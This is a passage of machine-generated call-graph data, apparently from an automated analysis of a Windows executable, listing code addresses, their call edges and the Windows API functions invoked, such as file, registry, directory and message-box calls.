5263 402594 5260->5263 5262 403261 5262->5255 5264 402598 5263->5264 5265 4025a2 5263->5265 5264->5265 5266 403154 4 API calls 5264->5266 5265->5262 5265->5265 5266->5265 5268 4025b0 5267->5268 5269 4025ba 5267->5269 5268->5269 5270 403154 4 API calls 5268->5270 5269->5250 5270->5269 5273 4031be 5271->5273 5272 4031e3 5272->5181 5273->5272 5274 4025ac 4 API calls 5273->5274 5274->5273 5276 405223 5275->5276 5277 405235 5275->5277 5278 403278 4 API calls 5276->5278 5279 40322c 4 API calls 5277->5279 5280 405233 5278->5280 5279->5280 5280->5184 5282 405264 5281->5282 5282->5192 5284 4033bc 5283->5284 5285 403254 4 API calls 5284->5285 5286 4033cf 5285->5286 5287 4031e8 4 API calls 5286->5287 5288 4033f7 5287->5288 5291 403230 5289->5291 5290 403252 5290->5222 5291->5290 5292 4025ac 4 API calls 5291->5292 5292->5290 5301 403414 5293->5301 5296 406fee 5297 407284 FormatMessageA 5296->5297 5298 4072aa 5297->5298 5299 403278 4 API calls 5298->5299 5300 4072c7 5299->5300 5300->5053 5302 403418 LoadLibraryA 5301->5302 5302->5296 5310 406af0 5303->5310 5305 406bf3 5306 406c05 5305->5306 5307 406af0 4 API calls 5305->5307 5308 403198 4 API calls 5306->5308 5307->5305 5309 406c1a 5308->5309 5309->5068 5311 406b1c 5310->5311 5312 403278 4 API calls 5311->5312 5313 406b29 5312->5313 5320 403420 5313->5320 5315 406b31 5316 4031e8 4 API calls 5315->5316 5317 406b49 5316->5317 5318 403198 4 API calls 5317->5318 5319 406b6b 5318->5319 5319->5305 5321 403426 5320->5321 5323 403437 5320->5323 5322 403254 4 API calls 5321->5322 5321->5323 5322->5323 5323->5315 5325 407578 5324->5325 5326 4075b7 CreateFileA 5325->5326 5326->5091 5328 403414 5327->5328 5329 4075b7 CreateFileA 5328->5329 5329->5091 5333 4073ec 5330->5333 5334 407284 5 API calls 5333->5334 5335 407414 5334->5335 5336 407434 5335->5336 5342 405184 5335->5342 5345 405880 5336->5345 5339 407443 5340 403198 4 API calls 5339->5340 5341 407460 5340->5341 5341->5092 5349 405198 5342->5349 5346 405887 5345->5346 5347 4031e8 4 API calls 5346->5347 5348 40589f 5347->5348 5348->5339 5350 4051b5 5349->5350 5357 404e48 5350->5357 5353 4051e1 5355 403278 4 API calls 5353->5355 5356 405193 5355->5356 5356->5336 5360 404e63 5357->5360 5358 404e75 5358->5353 5362 404bd4 5358->5362 5360->5358 5365 404f6a 5360->5365 5372 404e3c 5360->5372 5363 405930 5 API calls 5362->5363 5364 404be5 5363->5364 5364->5353 5366 404f7b 5365->5366 5369 404fc9 5365->5369 5368 40504f 5366->5368 5366->5369 5371 404fe7 5368->5371 5379 404e28 5368->5379 5369->5371 5375 404de4 5369->5375 5371->5360 5373 403198 4 API calls 5372->5373 5374 404e46 5373->5374 5374->5360 5376 404df2 5375->5376 5382 404bec 5376->5382 5378 404e20 5378->5369 5395 4039a4 5379->5395 5385 4059a0 5382->5385 5384 404c05 5384->5378 5386 4059ae 5385->5386 5387 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5386->5387 5388 4059d8 5387->5388 5389 405184 19 API calls 5388->5389 5390 4059e6 5389->5390 5391 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5390->5391 5392 4059f1 5391->5392 5393 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5392->5393 5394 405a0b 5393->5394 5394->5384 5396 4039ab 5395->5396 5401 4038b4 5396->5401 5398 4039cb 5399 403198 4 API calls 5398->5399 5400 4039d2 5399->5400 5400->5371 5402 4038d5 5401->5402 5403 4038c8 5401->5403 5405 403934 5402->5405 5406 4038db 5402->5406 5404 403780 6 API calls 5403->5404 5409 4038d0 5404->5409 5407 403993 5405->5407 5408 40393b 5405->5408 5410 4038e1 5406->5410 5411 4038ee 5406->5411 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5407->5413 5414 403941 5408->5414 5415 40394b 5408->5415 5409->5398 5416 403894 6 API calls 5410->5416 5412 403894 6 API calls 5411->5412 5417 4038fc 5412->5417 5413->5409 5418 403864 9 API calls 5414->5418 5419 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5415->5419 5416->5409 5420 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5417->5420 5418->5409 5421 40395d 5419->5421 5423 403917 5420->5423 5422 403864 9 API calls 5421->5422 5424 403976 5422->5424 5425 40374c VariantClear 5423->5425 5426 40374c VariantClear 5424->5426 5427 40392c 5425->5427 5428 40398b 5426->5428 5427->5398 5428->5398 5430 4034fd 5429->5430 5437 40352d 5429->5437 5431 403526 5430->5431 5433 403509 5430->5433 5434 403254 4 API calls 5431->5434 5432 403198 4 API calls 5435 403517 5432->5435 5444 4025c4 5433->5444 5434->5437 5435->5136 5437->5432 5439 407cd3 5438->5439 5440 407cc8 5438->5440 5448 407c5c 5439->5448 5440->5126 5443 405880 4 API calls 5443->5440 5445 4025ca 5444->5445 5446 4025dc 5445->5446 5447 403154 4 API calls 5445->5447 5446->5435 5446->5446 5447->5446 5449 407c70 5448->5449 5450 407caf 5448->5450 5449->5450 5452 407bac 5449->5452 5450->5440 5450->5443 5453 407bb7 5452->5453 5454 407bc8 5452->5454 5456 405880 4 API calls 5453->5456 5455 4074a0 20 API calls 5454->5455 5457 407bdc 5455->5457 5456->5454 5458 4074a0 20 API calls 5457->5458 5459 407bfd 5458->5459 5460 407918 InterlockedExchange 5459->5460 5461 407c12 5460->5461 5462 407c28 5461->5462 5463 405880 4 API calls 5461->5463 5462->5449 5463->5462 5465 4078d6 5464->5465 5466 4078e7 5464->5466 5467 4078db InterlockedExchange 5465->5467 5466->5012 5467->5466 6240 409e47 6241 409e6c 6240->6241 6242 4098f4 15 API calls 6241->6242 6245 409e71 6242->6245 6243 409ec4 6274 4026c4 GetSystemTime 6243->6274 6245->6243 6248 408dd8 4 API calls 6245->6248 6246 409ec9 6247 409330 32 API calls 6246->6247 6249 409ed1 6247->6249 6250 409ea0 6248->6250 6251 4031e8 4 API calls 6249->6251 6253 409ea8 MessageBoxA 6250->6253 6252 409ede 6251->6252 6254 406928 5 API calls 6252->6254 6253->6243 6256 409eb5 6253->6256 6255 409eeb 6254->6255 6257 4066c0 5 API calls 6255->6257 6258 405854 5 API calls 6256->6258 6259 409efb 6257->6259 6258->6243 6260 406638 5 API calls 6259->6260 6261 409f0c 6260->6261 6262 403340 4 API calls 6261->6262 6263 409f1a 6262->6263 6264 4031e8 4 API calls 6263->6264 6265 409f2a 6264->6265 6266 4074e0 23 API calls 6265->6266 6267 409f69 6266->6267 6268 402594 4 API calls 6267->6268 6269 409f89 6268->6269 6270 407a28 5 API calls 6269->6270 6271 409fcb 6270->6271 6272 407cb8 21 API calls 6271->6272 6273 409ff2 6272->6273 6274->6246 6201 407548 6202 407554 CloseHandle 6201->6202 6203 40755d 6201->6203 6202->6203 6653 402b48 RaiseException 6204 407749 6205 4076dc WriteFile 6204->6205 6213 407724 6204->6213 6206 4076e8 6205->6206 6207 4076ef 6205->6207 6208 40748c 21 API calls 6206->6208 6209 407700 6207->6209 6210 4073ec 20 API calls 6207->6210 6208->6207 6210->6209 6211 4077e0 6212 4078db InterlockedExchange 6211->6212 6214 407890 6211->6214 6215 4078e7 6212->6215 6213->6204 6213->6211 6654 40294a 6655 402952 6654->6655 6656 403554 4 API calls 6655->6656 6657 402967 6655->6657 6656->6655 6658 403f4a 6659 403f53 6658->6659 6660 403f5c 6658->6660 6662 403f07 6659->6662 6665 403f09 6662->6665 6663 403f3c 6663->6660 6666 403154 4 API calls 6665->6666 6668 403e9c 6665->6668 6671 403f3d 6665->6671 6685 403e9c 6665->6685 6666->6665 6667 403ef2 6670 402674 4 API calls 6667->6670 6668->6663 6668->6667 6673 403ea9 6668->6673 6676 403e8e 6668->6676 6675 403ecf 6670->6675 6671->6660 6674 402674 4 API calls 6673->6674 6673->6675 6674->6675 6675->6660 6677 403e4c 6676->6677 6678 403e67 6677->6678 6679 403e62 6677->6679 6680 403e7b 6677->6680 6683 403e78 6678->6683 6684 402674 4 API calls 6678->6684 6681 403cc8 4 API calls 6679->6681 6682 402674 4 API calls 6680->6682 6681->6678 6682->6683 6683->6667 6683->6673 6684->6683 6686 403ed7 6685->6686 6692 403ea9 6685->6692 6687 403ef2 6686->6687 6689 403e8e 4 API calls 6686->6689 6690 402674 4 API calls 6687->6690 6688 403ecf 6688->6665 6691 403ee6 6689->6691 6690->6688 6691->6687 6691->6692 6692->6688 6693 402674 4 API calls 6692->6693 6693->6688 6702 405150 6703 405163 6702->6703 6704 404e48 19 API calls 6703->6704 6705 405177 6704->6705 6275 403a52 6276 403a74 6275->6276 6277 403a5a WriteFile 6275->6277 6277->6276 6278 403a78 GetLastError 6277->6278 6278->6276 6279 402654 6280 403154 4 API calls 6279->6280 6281 402614 6280->6281 6282 403154 4 API calls 6281->6282 6283 402632 6281->6283 6282->6283 5650 409e62 5651 409aa0 4 API calls 5650->5651 5652 409e67 5651->5652 5653 409e6c 5652->5653 5753 402f24 5652->5753 5687 4098f4 5653->5687 5656 409ec4 5692 4026c4 GetSystemTime 5656->5692 5658 409e71 5658->5656 5758 408dd8 5658->5758 5659 409ec9 5693 409330 5659->5693 5663 409ea0 5666 409ea8 MessageBoxA 5663->5666 5664 4031e8 4 API calls 5665 409ede 5664->5665 5711 406928 5665->5711 5666->5656 5669 409eb5 5666->5669 5761 405854 5669->5761 5674 409f0c 5738 403340 5674->5738 5676 409f1a 5677 4031e8 4 API calls 5676->5677 5678 409f2a 5677->5678 5679 4074e0 23 API calls 5678->5679 5680 409f69 5679->5680 5681 402594 4 API calls 5680->5681 5682 409f89 5681->5682 5683 407a28 5 API calls 5682->5683 5684 409fcb 5683->5684 5685 407cb8 21 API calls 5684->5685 5686 409ff2 5685->5686 5765 40953c 5687->5765 5692->5659 5700 409350 5693->5700 5696 409375 CreateDirectoryA 5697 4093ed 5696->5697 5698 40937f GetLastError 5696->5698 5699 40322c 4 API calls 5697->5699 5698->5700 5701 4093f7 5699->5701 5700->5696 5702 408dd8 4 API calls 5700->5702 5706 407284 5 API calls 5700->5706 5710 405880 4 API calls 5700->5710 5857 406cf4 5700->5857 5880 409224 5700->5880 5899 404c84 5700->5899 5902 408da8 5700->5902 5703 4031b8 4 API calls 5701->5703 5702->5700 5705 409411 5703->5705 5707 4031b8 4 API calls 5705->5707 5706->5700 5708 40941e 5707->5708 5708->5664 5710->5700 6012 406820 5711->6012 5714 403454 4 API calls 5715 40694a 5714->5715 5716 4066c0 5715->5716 6017 4068e4 5716->6017 5719 4066f0 5721 403340 4 API calls 5719->5721 5720 4066fe 5722 403454 4 API calls 5720->5722 5723 4066fc 5721->5723 5724 406711 5722->5724 5726 403198 4 API calls 5723->5726 5725 403340 4 API calls 5724->5725 5725->5723 5727 406733 5726->5727 5728 406638 5727->5728 5729 406642 5728->5729 5730 406665 5728->5730 6023 406950 5729->6023 5732 40322c 4 API calls 5730->5732 5733 40666e 5732->5733 5733->5674 5734 406649 5734->5730 5735 406654 5734->5735 5736 403340 4 API calls 5735->5736 5737 406662 5736->5737 5737->5674 5739 403344 5738->5739 5740 4033a5 5738->5740 5741 4031e8 5739->5741 5742 40334c 5739->5742 5743 4031fc 5741->5743 5746 403254 4 API calls 5741->5746 5742->5740 5747 4031e8 4 API calls 5742->5747 5748 40335b 5742->5748 5744 403228 5743->5744 5749 4025ac 4 API calls 5743->5749 5744->5676 5745 403254 4 API calls 5750 403375 5745->5750 5746->5743 5747->5748 5748->5745 5749->5744 5751 4031e8 4 API calls 5750->5751 5752 4033a1 5751->5752 5752->5676 5754 403154 4 API calls 5753->5754 5755 402f29 5754->5755 6029 402bcc 5755->6029 5757 402f51 5757->5757 5759 408da8 4 API calls 5758->5759 5760 408df4 5759->5760 5760->5663 5762 405859 5761->5762 5763 405930 5 API calls 5762->5763 5764 40586b 5763->5764 5764->5764 5772 40955b 5765->5772 5766 409590 5768 40959d GetUserDefaultLangID 5766->5768 5773 409592 5766->5773 5767 409594 5783 407024 GetModuleHandleA GetProcAddress 5767->5783 5768->5773 5771 40956f 5777 409884 5771->5777 5772->5766 5772->5767 5772->5771 5773->5771 5774 4095cb GetACP 5773->5774 5775 4095ef 5773->5775 5774->5771 5774->5773 5775->5771 5776 409615 GetACP 5775->5776 5776->5771 5776->5775 5778 40988c 5777->5778 5782 4098c6 5777->5782 5779 403420 4 API calls 5778->5779 5778->5782 5780 4098c0 5779->5780 5841 408e80 5780->5841 5782->5658 5784 407067 5783->5784 5785 40705e 5783->5785 5786 407070 5784->5786 5787 4070a8 5784->5787 5796 403198 4 API calls 5785->5796 5804 406f68 5786->5804 5789 406f68 RegOpenKeyExA 5787->5789 5791 4070c1 5789->5791 5790 407089 5792 4070de 5790->5792 5807 406f5c 5790->5807 5791->5792 5793 406f5c 6 API calls 5791->5793 5794 40322c 4 API calls 5792->5794 5797 4070d5 RegCloseKey 5793->5797 5798 4070eb 5794->5798 5800 407120 5796->5800 5797->5792 5810 4032fc 5798->5810 5802 403198 4 API calls 5800->5802 5803 407128 5802->5803 5803->5773 5805 406f73 5804->5805 5806 406f79 RegOpenKeyExA 5804->5806 5805->5806 5806->5790 5824 406e10 5807->5824 5811 403300 5810->5811 5812 40333f 5810->5812 5813 4031e8 5811->5813 5814 40330a 5811->5814 5812->5785 5818 4031fc 5813->5818 5821 403254 4 API calls 5813->5821 5815 403334 5814->5815 5816 40331d 5814->5816 5817 4034f0 4 API calls 5815->5817 5820 4034f0 4 API calls 5816->5820 5823 403322 5817->5823 5819 403228 5818->5819 5822 4025ac 4 API calls 5818->5822 5819->5785 5820->5823 5821->5818 5822->5819 5823->5785 5825 406e36 RegQueryValueExA 5824->5825 5826 406e7b 5825->5826 5831 406e59 5825->5831 5828 403198 4 API calls 5826->5828 5827 406e73 5829 403198 4 API calls 5827->5829 5830 406f47 RegCloseKey 5828->5830 5829->5826 5830->5792 5831->5826 5831->5827 5832 403278 4 API calls 5831->5832 5833 403420 4 API calls 5831->5833 5832->5831 5834 406eb0 RegQueryValueExA 5833->5834 5834->5825 5835 406ecc 5834->5835 5835->5826 5836 4034f0 4 API calls 5835->5836 5837 406f0e 5836->5837 5838 406f20 5837->5838 5840 403420 4 API calls 5837->5840 5839 4031e8 4 API calls 5838->5839 5839->5826 5840->5838 5842 408e8e 5841->5842 5844 408ea6 5842->5844 5854 408e18 5842->5854 5845 408e18 4 API calls 5844->5845 5846 408eca 5844->5846 5845->5846 5847 407918 InterlockedExchange 5846->5847 5848 408ee5 5847->5848 5849 408e18 4 API calls 5848->5849 5851 408ef8 5848->5851 5849->5851 5850 408e18 4 API calls 5850->5851 5851->5850 5852 403278 4 API calls 5851->5852 5853 408f27 5851->5853 5852->5851 5853->5782 5855 405880 4 API calls 5854->5855 5856 408e29 5855->5856 5856->5844 5906 406a58 5857->5906 5860 406d26 5862 406a58 5 API calls 5860->5862 5864 406d72 5860->5864 5863 406d36 5862->5863 5865 406d42 5863->5865 5867 406a34 7 API calls 5863->5867 5914 406888 5864->5914 5865->5864 5868 406a58 5 API calls 5865->5868 5877 406d67 5865->5877 5867->5865 5871 406d5b 5868->5871 5874 406a34 7 API calls 5871->5874 5871->5877 5872 406638 5 API calls 5873 406d87 5872->5873 5875 40322c 4 API calls 5873->5875 5874->5877 5876 406d91 5875->5876 5878 4031b8 4 API calls 5876->5878 5877->5864 5926 406cc8 GetWindowsDirectoryA 5877->5926 5879 406dab 5878->5879 5879->5700 5881 409244 5880->5881 5882 406638 5 API calls 5881->5882 5883 40925d 5882->5883 5884 40322c 4 API calls 5883->5884 5891 409268 5884->5891 5885 406978 6 API calls 5885->5891 5887 408dd8 4 API calls 5887->5891 5888 4033b4 4 API calls 5888->5891 5889 405880 4 API calls 5889->5891 5891->5885 5891->5887 5891->5888 5891->5889 5892 4092e4 5891->5892 5966 4091b0 5891->5966 5974 409034 5891->5974 5893 40322c 4 API calls 5892->5893 5894 4092ef 5893->5894 5895 4031b8 4 API calls 5894->5895 5896 409309 5895->5896 5897 403198 4 API calls 5896->5897 5898 409311 5897->5898 5898->5700 5900 405198 19 API calls 5899->5900 5901 404ca2 5900->5901 5901->5700 5903 408dc8 5902->5903 6002 408c80 5903->6002 5907 4034f0 4 API calls 5906->5907 5909 406a6b 5907->5909 5908 406a82 GetEnvironmentVariableA 5908->5909 5910 406a8e 5908->5910 5909->5908 5913 406a95 5909->5913 5928 406dec 5909->5928 5912 403198 4 API calls 5910->5912 5912->5913 5913->5860 5923 406a34 5913->5923 5915 403414 5914->5915 5916 4068ab GetFullPathNameA 5915->5916 5917 4068b7 5916->5917 5918 4068ce 5916->5918 5917->5918 5919 4068bf 5917->5919 5920 40322c 4 API calls 5918->5920 5921 403278 4 API calls 5919->5921 5922 4068cc 5920->5922 5921->5922 5922->5872 5932 4069dc 5923->5932 5927 406ce9 5926->5927 5927->5864 5929 406dfa 5928->5929 5930 4034f0 4 API calls 5929->5930 5931 406e08 5930->5931 5931->5909 5939 406978 5932->5939 5934 4069fe 5935 406a06 GetFileAttributesA 5934->5935 5936 406a1b 5935->5936 5937 403198 4 API calls 5936->5937 5938 406a23 5937->5938 5938->5860 5949 406744 5939->5949 5941 4069b0 5944 4069c6 5941->5944 5945 4069bb 5941->5945 5943 406989 5943->5941 5956 406970 CharPrevA 5943->5956 5957 403454 5944->5957 5946 40322c 4 API calls 5945->5946 5948 4069c4 5946->5948 5948->5934 5952 406755 5949->5952 5950 4067b9 5951 406680 IsDBCSLeadByte 5950->5951 5953 4067b4 5950->5953 5951->5953 5952->5950 5954 406773 5952->5954 5953->5943 5954->5953 5964 406680 IsDBCSLeadByte 5954->5964 5956->5943 5958 403486 5957->5958 5959 403459 5957->5959 5960 403198 4 API calls 5958->5960 5959->5958 5962 40346d 5959->5962 5961 40347c 5960->5961 5961->5948 5963 403278 4 API calls 5962->5963 5963->5961 5965 406694 5964->5965 5965->5954 5967 403198 4 API calls 5966->5967 5968 4091d1 5967->5968 5971 4091fe 5968->5971 5983 4032a8 5968->5983 5986 403494 5968->5986 5972 403198 4 API calls 5971->5972 5973 409213 5972->5973 5973->5891 5990 408f70 5974->5990 5976 40904a 5977 40904e 5976->5977 5996 406a48 5976->5996 5977->5891 5980 409081 5999 408fac 5980->5999 5984 403278 4 API calls 5983->5984 5985 4032b5 5984->5985 5985->5968 5987 403498 5986->5987 5988 4034c3 5986->5988 5989 4034f0 4 API calls 5987->5989 5988->5968 5989->5988 5991 408f7a 5990->5991 5992 408f7e 5990->5992 5991->5976 5993 408fa0 SetLastError 5992->5993 5994 408f87 Wow64DisableWow64FsRedirection 5992->5994 5995 408f9b 5993->5995 5994->5995 5995->5976 5997 4069dc 7 API calls 5996->5997 5998 406a52 GetLastError 5997->5998 5998->5980 6000 408fb1 Wow64RevertWow64FsRedirection 5999->6000 6001 408fbb 5999->6001 6000->6001 6001->5891 6003 403198 4 API calls 6002->6003 6004 408cb1 6002->6004 6003->6004 6006 408cc8 6004->6006 6008 403278 4 API calls 6004->6008 6010 408cdc 6004->6010 6011 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6011 6005 4031b8 4 API calls 6007 408d69 6005->6007 6009 4032fc 4 API calls 6006->6009 6007->5700 6008->6004 6009->6010 6010->6005 6011->6004 6013 406744 IsDBCSLeadByte 6012->6013 6015 406835 6013->6015 6014 40687f 6014->5714 6015->6014 6016 406680 IsDBCSLeadByte 6015->6016 6016->6015 6018 4068f3 6017->6018 6019 406820 IsDBCSLeadByte 6018->6019 6022 4068fe 6019->6022 6020 4066ea 6020->5719 6020->5720 6021 406680 IsDBCSLeadByte 6021->6022 6022->6020 6022->6021 6024 406957 6023->6024 6025 40695b 6023->6025 6024->5734 6028 406970 CharPrevA 6025->6028 6027 40696c 6027->5734 6028->6027 6030 402bd5 RaiseException 6029->6030 6031 402be6 6029->6031 6030->6031 6031->5757 6284 402e64 6285 402e69 6284->6285 6286 402e7a RtlUnwind 6285->6286 6287 402e5e 6285->6287 6288 402e9d 6286->6288 6305 40667c IsDBCSLeadByte 6306 406694 6305->6306 6718 403f7d 6719 403fa2 6718->6719 6720 403f84 6718->6720 6719->6720 6722 403e8e 4 API calls 6719->6722 6721 403f8c 6720->6721 6723 402674 4 API calls 6720->6723 6722->6720 6724 403fca 6723->6724 6731 403d02 6737 403d12 6731->6737 6732 403ddf ExitProcess 6733 403db8 6735 403cc8 4 API calls 6733->6735 6734 403dea 6736 403dc2 6735->6736 6738 403cc8 4 API calls 6736->6738 6737->6732 6737->6733 6737->6734 6737->6737 6740 403da4 6737->6740 6741 403d8f MessageBoxA 6737->6741 6739 403dcc 6738->6739 6751 4019dc 6739->6751 6747 403fe4 6740->6747 6741->6733 6744 403dd1 6744->6732 6744->6734 6748 403fe8 6747->6748 6749 403f07 4 API calls 6748->6749 6750 404006 6749->6750 6752 401abb 6751->6752 6753 4019ed 6751->6753 6752->6744 6754 401a04 RtlEnterCriticalSection 6753->6754 6755 401a0e LocalFree 6753->6755 6754->6755 6756 401a41 6755->6756 6757 401a2f VirtualFree 6756->6757 6758 401a49 6756->6758 6757->6756 6759 401a70 LocalFree 6758->6759 6760 401a87 6758->6760 6759->6759 6759->6760 6761 401aa9 RtlDeleteCriticalSection 6760->6761 6762 401a9f RtlLeaveCriticalSection 6760->6762 6761->6744 6762->6761 6315 404206 6316 4041cc 6315->6316 6317 40420a 6315->6317 6318 404282 6317->6318 6319 403154 4 API calls 6317->6319 6320 404323 6319->6320 6321 402c08 6324 402c82 6321->6324 6325 402c19 6321->6325 6322 402c56 RtlUnwind 6323 403154 4 API calls 6322->6323 6323->6324 6325->6322 6325->6324 6328 402b28 6325->6328 6329 402b31 RaiseException 6328->6329 6330 402b47 6328->6330 6329->6330 6330->6322 6331 408c10 6332 408c17 6331->6332 6333 403198 4 API calls 6332->6333 6341 408cb1 6333->6341 6334 408cdc 6335 4031b8 4 API calls 6334->6335 6337 408d69 6335->6337 6336 408cc8 6339 4032fc 4 API calls 6336->6339 6338 403278 4 API calls 6338->6341 6339->6334 6340 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6340->6341 6341->6334 6341->6336 6341->6338 6341->6340 6342 40a011 6343 40a036 6342->6343 6344 407918 InterlockedExchange 6343->6344 6346 40a060 6344->6346 6345 40a070 6352 4076ac SetEndOfFile 6345->6352 6346->6345 6347 409aa0 4 API calls 6346->6347 6347->6345 6349 40a08c 6350 4025ac 4 API calls 6349->6350 6351 40a0c3 6350->6351 6353 4076c3 6352->6353 6354 4076bc 6352->6354 6353->6349 6355 40748c 21 API calls 6354->6355 6355->6353 6767 409916 6768 409918 6767->6768 6769 40993a 6768->6769 6770 409956 CallWindowProcA 6768->6770 6770->6769 6083 407017 6084 407008 SetErrorMode 6083->6084 6360 403018 6361 403070 6360->6361 6362 403025 6360->6362 6363 40302a RtlUnwind 6362->6363 6364 40304e 6363->6364 6366 402f78 6364->6366 6367 402be8 6364->6367 6368 402bf1 RaiseException 6367->6368 6369 402c04 6367->6369 6368->6369 6369->6361 6777 409918 6778 40993a 6777->6778 6780 409927 6777->6780 6779 409956 CallWindowProcA 6779->6778 6780->6778 6780->6779 6374 40901e 6375 409010 6374->6375 6376 408fac Wow64RevertWow64FsRedirection 6375->6376 6377 409018 6376->6377 6378 409020 SetLastError 6379 409029 6378->6379 6390 403a28 ReadFile 6391 403a46 6390->6391 6392 403a49 GetLastError 6390->6392 6221 40762c ReadFile 6222 407663 6221->6222 6223 40764c 6221->6223 6224 407652 GetLastError 6223->6224 6225 40765c 6223->6225 6224->6222 6224->6225 6226 40748c 21 API calls 6225->6226 6226->6222 6397 40a02c 6398 409aa0 4 API calls 6397->6398 6399 40a031 6398->6399 6400 40a036 6399->6400 6401 402f24 5 API calls 6399->6401 6402 407918 InterlockedExchange 6400->6402 6401->6400 6403 40a060 6402->6403 6404 40a070 6403->6404 6405 409aa0 4 API calls 6403->6405 6406 4076ac 22 API calls 6404->6406 6405->6404 6407 40a08c 6406->6407 6408 4025ac 4 API calls 6407->6408 6409 40a0c3 6408->6409 6781 40712e 6782 407118 6781->6782 6783 403198 4 API calls 6782->6783 6784 407120 6783->6784 6785 403198 4 API calls 6784->6785 6786 407128 6785->6786 6787 408f30 6790 408dfc 6787->6790 6791 408e05 6790->6791 6792 403198 4 API calls 6791->6792 6793 408e13 6791->6793 6792->6791 6794 403932 6795 403924 6794->6795 6798 40374c 6795->6798 6797 40392c 6799 403766 6798->6799 6800 403759 6798->6800 6799->6797 6800->6799 6801 403779 VariantClear 6800->6801 6801->6797 6032 4075c4 SetFilePointer 6033 4075f7 6032->6033 6034 4075e7 GetLastError 6032->6034 6034->6033 6035 4075f0 6034->6035 6036 40748c 21 API calls 6035->6036 6036->6033 6410 405ac4 6411 405acc 6410->6411 6414 405ad4 6410->6414 6412 405ad2 6411->6412 6413 405adb 6411->6413 6417 405a3c 6412->6417 6415 405930 5 API calls 6413->6415 6415->6414 6418 405a44 6417->6418 6419 405a5e 6418->6419 6420 403154 4 API calls 6418->6420 6421 405a63 6419->6421 6422 405a7a 6419->6422 6420->6418 6423 405930 5 API calls 6421->6423 6424 403154 4 API calls 6422->6424 6425 405a76 6423->6425 6426 405a7f 6424->6426 6428 403154 4 API calls 6425->6428 6427 4059a0 19 API calls 6426->6427 6427->6425 6429 405aa8 6428->6429 6430 403154 4 API calls 6429->6430 6431 405ab6 6430->6431 6431->6414 6432 4076c8 WriteFile 6433 4076e8 6432->6433 6434 4076ef 6432->6434 6435 40748c 21 API calls 6433->6435 6436 407700 6434->6436 6437 4073ec 20 API calls 6434->6437 6435->6434 6437->6436 6438 40a2ca 6447 4096fc 6438->6447 6441 402f24 5 API calls 6442 40a2d4 6441->6442 6443 403198 4 API calls 6442->6443 6444 40a2f3 6443->6444 6445 403198 4 API calls 6444->6445 6446 40a2fb 6445->6446 6456 40569c 6447->6456 6449 409717 6450 409745 6449->6450 6462 40720c 6449->6462 6453 403198 4 API calls 6450->6453 6452 409735 6455 40973d MessageBoxA 6452->6455 6454 40975a 6453->6454 6454->6441 6455->6450 6457 403154 4 API calls 6456->6457 6458 4056a1 6457->6458 6459 4056b9 6458->6459 6460 403154 4 API calls 6458->6460 6459->6449 6461 4056af 6460->6461 6461->6449 6463 40569c 4 API calls 6462->6463 6464 40721b 6463->6464 6465 407221 6464->6465 6466 40722f 6464->6466 6467 40322c 4 API calls 6465->6467 6468 40724b 6466->6468 6469 40723f 6466->6469 6471 40722d 6467->6471 6480 4032b8 6468->6480 6473 4071d0 6469->6473 6471->6452 6474 40322c 4 API calls 6473->6474 6475 4071df 6474->6475 6476 4071fc 6475->6476 6477 406950 CharPrevA 6475->6477 6476->6471 6478 4071eb 6477->6478 6478->6476 6479 4032fc 4 API calls 6478->6479 6479->6476 6481 403278 4 API calls 6480->6481 6482 4032c2 6481->6482 6482->6471 6483 402ccc 6484 402cdd 6483->6484 6488 402cfe 6483->6488 6485 402d88 RtlUnwind 6484->6485 6487 402b28 RaiseException 6484->6487 6484->6488 6486 403154 4 API calls 6485->6486 6486->6488 6489 402d7f 6487->6489 6489->6485 6810 403fcd 6811 403f07 4 API calls 6810->6811 6812 403fd6 6811->6812 6813 403e9c 4 API calls 6812->6813 6814 403fe2 6813->6814 5468 4024d0 5469 4024e4 5468->5469 5470 4024f7 5468->5470 5507 401918 RtlInitializeCriticalSection 5469->5507 5472 402518 5470->5472 5473 40250e RtlEnterCriticalSection 5470->5473 5484 402300 5472->5484 5473->5472 5477 4024ed 5479 402531 5482 402525 5479->5482 5514 40215c 5479->5514 5480 402581 5481 402577 RtlLeaveCriticalSection 5481->5480 5482->5480 5482->5481 5485 402314 5484->5485 5486 402335 5485->5486 5491 4023b8 5485->5491 5487 402344 5486->5487 5528 401b74 5486->5528 5487->5482 5494 401fd4 5487->5494 5491->5487 5492 402455 5491->5492 5531 401d80 5491->5531 5539 401e84 5491->5539 5492->5487 5535 401d00 5492->5535 5495 401fe8 5494->5495 5496 401ffb 5494->5496 5497 401918 4 API calls 5495->5497 5498 402012 RtlEnterCriticalSection 5496->5498 5501 40201c 5496->5501 5499 401fed 5497->5499 5498->5501 5499->5496 5500 401ff1 5499->5500 5504 402052 5500->5504 5501->5504 5621 401ee0 5501->5621 5504->5479 5505 402147 5505->5479 5506 40213d RtlLeaveCriticalSection 5506->5505 5508 401946 5507->5508 5509 40193c RtlEnterCriticalSection 5507->5509 5510 401964 LocalAlloc 5508->5510 5509->5508 5511 40197e 5510->5511 5512 4019c3 RtlLeaveCriticalSection 5511->5512 5513 4019cd 5511->5513 5512->5513 5513->5470 5513->5477 5515 40217a 5514->5515 5516 402175 5514->5516 5518 4021ab RtlEnterCriticalSection 5515->5518 5521 4021b5 5515->5521 5522 40217e 5515->5522 5517 401918 4 API calls 5516->5517 5517->5515 5518->5521 5519 4021c1 5523 4022e3 RtlLeaveCriticalSection 5519->5523 5524 4022ed 5519->5524 5520 402244 5520->5522 5525 401d80 7 API calls 5520->5525 5521->5519 5521->5520 5526 402270 5521->5526 5522->5482 5523->5524 5524->5482 5525->5522 5526->5519 5527 401d00 7 API calls 5526->5527 5527->5519 5529 40215c 9 API calls 5528->5529 5530 401b95 5529->5530 5530->5487 5532 401d89 5531->5532 5534 401d92 5531->5534 5533 401b74 9 API calls 5532->5533 5532->5534 5533->5534 5534->5491 5536 401d4e 5535->5536 5537 401d1e 5535->5537 5536->5537 5544 401c68 5536->5544 5537->5487 5599 401768 5539->5599 5541 401e99 5543 401ea6 5541->5543 5610 401dcc 5541->5610 5543->5491 5545 401c7a 5544->5545 5546 401c9d 5545->5546 5547 401caf 